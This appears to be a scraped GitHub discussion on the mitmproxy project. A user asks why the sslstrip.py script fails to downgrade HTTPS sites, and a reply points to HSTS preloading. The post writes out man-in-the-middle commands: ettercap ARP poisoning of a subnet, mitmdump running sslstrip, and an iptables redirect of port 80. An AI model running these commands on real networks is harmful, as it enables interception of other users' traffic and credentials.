Replies: 2 comments
-
The examples in contrib/ are explicitly without support, so I'm moving this to discussions. |
Beta Was this translation helpful? Give feedback.
0 replies
-
It's possible that every site you've tried is in https://hstspreload.org/ and browsers ship hard coded HSTS. |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
Problem Description
I want to downgrade HTTPS to HTTP using sslstrip.py from @mhils. But no matter which site I'm trying, I get the HTTPS version.
Steps to reproduce the behavior:
root@kali: $ettercap -Tq -M arp:remote -i eth0 -S ///
root@kali: $./mitmdump -s sslstrip.py
root@kali: $iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Exepected behaviour: The site gets downgraded to HTTP
Actual behaviour: I still get the HTTPS version
System Information
Paste the output of "mitmproxy --version" here.
Mitmproxy: 9.0.1 binary
Python: 3.11.0
OpenSSL: OpenSSL 3.0.7 1 Nov 2022
Platform: Linux-6.1.0-kali7-amd64-x86_64-with-glibc2.36
Used machines
(Both VM's are using NAT so the NIC for kali is eth0)
Please let me know if I'm making any stupid mistake and/or how I can fix this issue.
Thanks in advance!
Beta Was this translation helpful? Give feedback.
All reactions